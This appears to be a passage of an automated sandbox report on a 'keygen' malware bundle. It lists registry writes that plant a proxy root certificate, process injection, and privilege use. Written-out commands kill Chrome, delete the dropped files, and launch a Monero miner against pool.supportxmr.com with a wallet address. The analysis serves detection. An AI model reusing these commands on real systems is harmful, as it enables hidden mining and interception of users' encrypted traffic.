645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Driver.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 19000000010000001000000018e847daffeaedafa0faaea36340ea790f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Driver.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

2552 PING.EXE
3008 PING.EXE
2156 PING.EXE
2964 PING.EXE
2900 PING.EXE
2996 PING.EXE
1168 PING.EXE

pid	process
2552	PING.EXE
3008	PING.EXE
2156	PING.EXE
2964	PING.EXE
2900	PING.EXE
2996	PING.EXE
1168	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Driver.exe6461839.71WerFault.exe

pid	process
2712	Driver.exe
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
2720	WerFault.exe
2720	WerFault.exe
2720	WerFault.exe
2720	WerFault.exe
2720	WerFault.exe
2720	WerFault.exe
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71
620	6461839.71

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

BTRSetp.exetaskkill.exeBTRSetp.exemsiexec.exemsiexec.exemsiexec.exe2995659.326461839.71Driver.exeWerFault.exeDriver.exe

description	pid	process
Token: SeDebugPrivilege	1904	BTRSetp.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	2380	BTRSetp.exe
Token: SeShutdownPrivilege	2616	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	980	msiexec.exe
Token: SeTakeOwnershipPrivilege	980	msiexec.exe
Token: SeSecurityPrivilege	980	msiexec.exe
Token: SeShutdownPrivilege	1808	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1808	msiexec.exe
Token: SeDebugPrivilege	1848	2995659.32
Token: SeDebugPrivilege	620	6461839.71
Token: SeDebugPrivilege	2200	Driver.exe
Token: SeDebugPrivilege	2720	WerFault.exe
Token: SeDebugPrivilege	1652	Driver.exe
Token: SeCreateTokenPrivilege	1808	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1808	msiexec.exe
Token: SeLockMemoryPrivilege	1808	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1808	msiexec.exe
Token: SeMachineAccountPrivilege	1808	msiexec.exe
Token: SeTcbPrivilege	1808	msiexec.exe
Token: SeSecurityPrivilege	1808	msiexec.exe
Token: SeTakeOwnershipPrivilege	1808	msiexec.exe
Token: SeLoadDriverPrivilege	1808	msiexec.exe
Token: SeSystemProfilePrivilege	1808	msiexec.exe
Token: SeSystemtimePrivilege	1808	msiexec.exe
Token: SeProfSingleProcessPrivilege	1808	msiexec.exe
Token: SeIncBasePriorityPrivilege	1808	msiexec.exe
Token: SeCreatePagefilePrivilege	1808	msiexec.exe
Token: SeCreatePermanentPrivilege	1808	msiexec.exe
Token: SeBackupPrivilege	1808	msiexec.exe
Token: SeRestorePrivilege	1808	msiexec.exe
Token: SeShutdownPrivilege	1808	msiexec.exe
Token: SeDebugPrivilege	1808	msiexec.exe
Token: SeAuditPrivilege	1808	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1808	msiexec.exe
Token: SeChangeNotifyPrivilege	1808	msiexec.exe
Token: SeRemoteShutdownPrivilege	1808	msiexec.exe
Token: SeUndockPrivilege	1808	msiexec.exe
Token: SeSyncAgentPrivilege	1808	msiexec.exe
Token: SeEnableDelegationPrivilege	1808	msiexec.exe
Token: SeManageVolumePrivilege	1808	msiexec.exe
Token: SeImpersonatePrivilege	1808	msiexec.exe
Token: SeCreateGlobalPrivilege	1808	msiexec.exe
Token: SeCreateTokenPrivilege	2616	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2616	msiexec.exe
Token: SeLockMemoryPrivilege	2616	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2616	msiexec.exe
Token: SeMachineAccountPrivilege	2616	msiexec.exe
Token: SeTcbPrivilege	2616	msiexec.exe
Token: SeSecurityPrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeLoadDriverPrivilege	2616	msiexec.exe
Token: SeSystemProfilePrivilege	2616	msiexec.exe
Token: SeSystemtimePrivilege	2616	msiexec.exe
Token: SeProfSingleProcessPrivilege	2616	msiexec.exe
Token: SeIncBasePriorityPrivilege	2616	msiexec.exe
Token: SeCreatePagefilePrivilege	2616	msiexec.exe
Token: SeCreatePermanentPrivilege	2616	msiexec.exe
Token: SeBackupPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeShutdownPrivilege	2616	msiexec.exe
Token: SeDebugPrivilege	2616	msiexec.exe
Token: SeAuditPrivilege	2616	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exemsiexec.exe

pid process

2616 msiexec.exe
1808 msiexec.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Downloads.exe

pid process

1872 Downloads.exe
1872 Downloads.exe

pid	process
2616	msiexec.exe
1808	msiexec.exe

pid	process
1872	Downloads.exe
1872	Downloads.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

keygen-step-4.exeBTRSetp.exeDriver.execonhost.exefile.execonhost.exeSetup.exeBDD.tmp.exe

description	pid	process	target process
PID 432 wrote to memory of 1032	432	keygen-step-4.exe	file.exe
PID 432 wrote to memory of 1032	432	keygen-step-4.exe	file.exe
PID 432 wrote to memory of 1032	432	keygen-step-4.exe	file.exe
PID 432 wrote to memory of 1032	432	keygen-step-4.exe	file.exe
PID 1904 wrote to memory of 1856	1904	BTRSetp.exe	6834865.75
PID 1904 wrote to memory of 1856	1904	BTRSetp.exe	6834865.75
PID 1904 wrote to memory of 1856	1904	BTRSetp.exe	6834865.75
PID 1904 wrote to memory of 1856	1904	BTRSetp.exe	6834865.75
PID 1904 wrote to memory of 1496	1904	BTRSetp.exe	5549966.61
PID 1904 wrote to memory of 1496	1904	BTRSetp.exe	5549966.61
PID 1904 wrote to memory of 1496	1904	BTRSetp.exe	5549966.61
PID 1904 wrote to memory of 1496	1904	BTRSetp.exe	5549966.61
PID 1904 wrote to memory of 620	1904	BTRSetp.exe	6461839.71
PID 1904 wrote to memory of 620	1904	BTRSetp.exe	6461839.71
PID 1904 wrote to memory of 620	1904	BTRSetp.exe	6461839.71
PID 1904 wrote to memory of 620	1904	BTRSetp.exe	6461839.71
PID 1904 wrote to memory of 316	1904	BTRSetp.exe	7687336.84
PID 1904 wrote to memory of 316	1904	BTRSetp.exe	7687336.84
PID 1904 wrote to memory of 316	1904	BTRSetp.exe	7687336.84
PID 1904 wrote to memory of 316	1904	BTRSetp.exe	7687336.84
PID 1320 wrote to memory of 2224	1320	Driver.exe	conhost.exe
PID 1320 wrote to memory of 2224	1320	Driver.exe	conhost.exe
PID 1320 wrote to memory of 2224	1320	Driver.exe	conhost.exe
PID 1320 wrote to memory of 2224	1320	Driver.exe	conhost.exe
PID 2224 wrote to memory of 2280	2224	conhost.exe	taskkill.exe
PID 2224 wrote to memory of 2280	2224	conhost.exe	taskkill.exe
PID 2224 wrote to memory of 2280	2224	conhost.exe	taskkill.exe
PID 2224 wrote to memory of 2280	2224	conhost.exe	taskkill.exe
PID 1032 wrote to memory of 2296	1032		BDD.tmp.exe
PID 1032 wrote to memory of 2296	1032		BDD.tmp.exe
PID 1032 wrote to memory of 2296	1032		BDD.tmp.exe
PID 1032 wrote to memory of 2296	1032		BDD.tmp.exe
PID 1608 wrote to memory of 2328	1608	file.exe	CA0.tmp.exe
PID 1608 wrote to memory of 2328	1608	file.exe	CA0.tmp.exe
PID 1608 wrote to memory of 2328	1608	file.exe	CA0.tmp.exe
PID 1608 wrote to memory of 2328	1608	file.exe	CA0.tmp.exe
PID 1032 wrote to memory of 2484	1032		conhost.exe
PID 1032 wrote to memory of 2484	1032		conhost.exe
PID 1032 wrote to memory of 2484	1032		conhost.exe
PID 1032 wrote to memory of 2484	1032		conhost.exe
PID 2484 wrote to memory of 2552	2484	conhost.exe	PING.EXE
PID 2484 wrote to memory of 2552	2484	conhost.exe	PING.EXE
PID 2484 wrote to memory of 2552	2484	conhost.exe	PING.EXE
PID 2484 wrote to memory of 2552	2484	conhost.exe	PING.EXE
PID 432 wrote to memory of 2532	432	keygen-step-4.exe	conhost.exe
PID 432 wrote to memory of 2532	432	keygen-step-4.exe	conhost.exe
PID 432 wrote to memory of 2532	432	keygen-step-4.exe	conhost.exe
PID 432 wrote to memory of 2532	432	keygen-step-4.exe	conhost.exe
PID 432 wrote to memory of 2532	432	keygen-step-4.exe	conhost.exe
PID 432 wrote to memory of 2532	432	keygen-step-4.exe	conhost.exe
PID 432 wrote to memory of 2532	432	keygen-step-4.exe	conhost.exe
PID 2056 wrote to memory of 2616	2056	Setup.exe	msiexec.exe
PID 2056 wrote to memory of 2616	2056	Setup.exe	msiexec.exe
PID 2056 wrote to memory of 2616	2056	Setup.exe	msiexec.exe
PID 2056 wrote to memory of 2616	2056	Setup.exe	msiexec.exe
PID 2056 wrote to memory of 2616	2056	Setup.exe	msiexec.exe
PID 2056 wrote to memory of 2616	2056	Setup.exe	msiexec.exe
PID 2056 wrote to memory of 2616	2056	Setup.exe	msiexec.exe
PID 2296 wrote to memory of 2712	2296	BDD.tmp.exe	Driver.exe
PID 2296 wrote to memory of 2712	2296	BDD.tmp.exe	Driver.exe
PID 2296 wrote to memory of 2712	2296	BDD.tmp.exe	Driver.exe
PID 2296 wrote to memory of 2712	2296	BDD.tmp.exe	Driver.exe
PID 2296 wrote to memory of 2712	2296	BDD.tmp.exe	Driver.exe
PID 2296 wrote to memory of 2712	2296	BDD.tmp.exe	Driver.exe

C:\Users\Admin\AppData\Local\Temp\Downloads.exe
"C:\Users\Admin\AppData\Local\Temp\Downloads.exe"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1872

C:\Users\Admin\Desktop\keygen-step-4.exe
"C:\Users\Admin\Desktop\keygen-step-4.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:432

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
2⤵
- Executes dropped EXE
PID:1032

C:\Users\Admin\AppData\Roaming\BDD.tmp.exe
"C:\Users\Admin\AppData\Roaming\BDD.tmp.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2296

C:\Users\Admin\AppData\Roaming\BDD.tmp.exe
"C:\Users\Admin\AppData\Roaming\BDD.tmp.exe"
4⤵
PID:2712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
3⤵
PID:2484

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:2552

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
2⤵
PID:2532

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
3⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1808

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
3⤵
PID:2820

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:2964

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
2⤵
PID:1652

C:\Users\Admin\AppData\Local\Temp\22CH5EH9FN\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\22CH5EH9FN\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
3⤵
- Executes dropped EXE
PID:2692

C:\Users\Admin\AppData\Local\Temp\22CH5EH9FN\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\22CH5EH9FN\multitimer.exe" 1 101
4⤵
PID:1496

C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"
2⤵
- Executes dropped EXE
PID:2060

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:2800

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:2128

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
2⤵
- Executes dropped EXE
PID:2440

C:\Users\Admin\Desktop\file.exe
"C:\Users\Admin\Desktop\file.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1608

C:\Users\Admin\AppData\Roaming\CA0.tmp.exe
"C:\Users\Admin\AppData\Roaming\CA0.tmp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2328

C:\Users\Admin\AppData\Roaming\CA0.tmp.exe
"C:\Users\Admin\AppData\Roaming\CA0.tmp.exe"
3⤵
PID:2900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Desktop\file.exe"
2⤵
PID:2952

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
3⤵
- Runs ping.exe
PID:3008

C:\Users\Admin\Desktop\askinstall20.exe
"C:\Users\Admin\Desktop\askinstall20.exe"
1⤵
- Executes dropped EXE
PID:1320

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:2224

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Users\Admin\Desktop\keygen-step-1.exe
"C:\Users\Admin\Desktop\keygen-step-1.exe"
1⤵
- Executes dropped EXE
PID:1808

C:\Users\Admin\Desktop\BTRSetp.exe
"C:\Users\Admin\Desktop\BTRSetp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1904

C:\ProgramData\6834865.75
"C:\ProgramData\6834865.75"
2⤵
- Executes dropped EXE
PID:1856

C:\ProgramData\5549966.61
"C:\ProgramData\5549966.61"
2⤵
- Executes dropped EXE
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 632
3⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720

C:\ProgramData\6461839.71
"C:\ProgramData\6461839.71"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2376

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2612

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
PID:2796

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2256

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
PID:2660

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
